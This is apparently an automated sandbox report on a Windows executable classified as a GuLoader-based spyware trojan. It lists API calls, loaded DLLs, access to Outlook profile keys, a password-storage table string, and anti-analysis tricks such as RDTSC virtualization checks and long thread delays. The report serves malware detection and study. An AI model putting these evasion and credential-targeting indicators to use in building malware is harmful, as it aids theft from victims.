            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E18483_2_384E1848
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E00403_2_384E0040
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E18583_2_384E1858
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E70613_2_384E7061
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E70703_2_384E7070
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E48103_2_384E4810
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E48203_2_384E4820
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E20F83_2_384E20F8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E21083_2_384E2108
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EF1203_2_384EF120
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EF1303_2_384EF130
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EA9AF3_2_384EA9AF
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E29B83_2_384E29B8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E32583_2_384E3258
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E32683_2_384E3268
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E52083_2_384E5208
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E52073_2_384E5207
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EBA973_2_384EBA97
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E5AA83_2_384E5AA8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E5AB83_2_384E5AB8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EA35F3_2_384EA35F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E63583_2_384E6358
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E63683_2_384E6368
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E7B623_2_384E7B62
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E3B083_2_384E3B08
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E3B183_2_384E3B18
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E43C83_2_384E43C8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E6C093_2_384E6C09
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E14003_2_384E1400
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E6C183_2_384E6C18
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E74C83_2_384E74C8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E1CA03_2_384E1CA0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E74B83_2_384E74B8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E1CB03_2_384E1CB0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E255F3_2_384E255F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E25603_2_384E2560
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E9D0B3_2_384E9D0B
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E4DB23_2_384E4DB2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E4DB03_2_384E4DB0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E86403_2_384E8640
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E56503_2_384E5650
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E56603_2_384E5660
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E2E003_2_384E2E00
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E2E103_2_384E2E10
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E36C23_2_384E36C2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E96C33_2_384E96C3
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E36C03_2_384E36C0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E0EB93_2_384E0EB9
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E3F723_2_384E3F72
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E3F703_2_384E3F70
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E5F103_2_384E5F10
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EAFF83_2_384EAFF8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EAFF73_2_384EAFF7
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E0FA83_2_384E0FA8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E67B03_2_384E67B0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_38A1D6083_2_38A1D608
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_38A1E7903_2_38A1E790
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_38A16FA03_2_38A16FA0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_38A183283_2_38A18328
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: String function: 00402C41 appears 51 times
            Source: rXKfKM0T49.exe, 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exe, 00000003.00000000.1811523290.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exe, 00000003.00000002.2649479506.00000000355E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs rXKfKM0T49.exe
            Source: rXKfKM0T49.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile created: C:\Users\user\AppData\Local\Temp\nsoC014.tmpJump to behavior
            Source: rXKfKM0T49.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rXKfKM0T49.exe, 00000003.00000002.2652046885.000000003678D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rXKfKM0T49.exeVirustotal: Detection: 75%
            Source: rXKfKM0T49.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile read: C:\Users\user\Desktop\rXKfKM0T49.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: rXKfKM0T49.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.1814401893.0000000003E6F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2624047215.00000000022BF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_70091B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70091B5F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile created: C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI/Special instruction interceptor: Address: 479A97A
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI/Special instruction interceptor: Address: 2BEA97A
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRDTSC instruction interceptor: First address: 475E566 second address: 475E566 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC80CC5D048h 0x00000006 test ebx, edx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRDTSC instruction interceptor: First address: 2BAE566 second address: 2BAE566 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FC80CB05D88h 0x00000006 test ebx, edx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: 35760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: 35410000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597234Jump to behavior
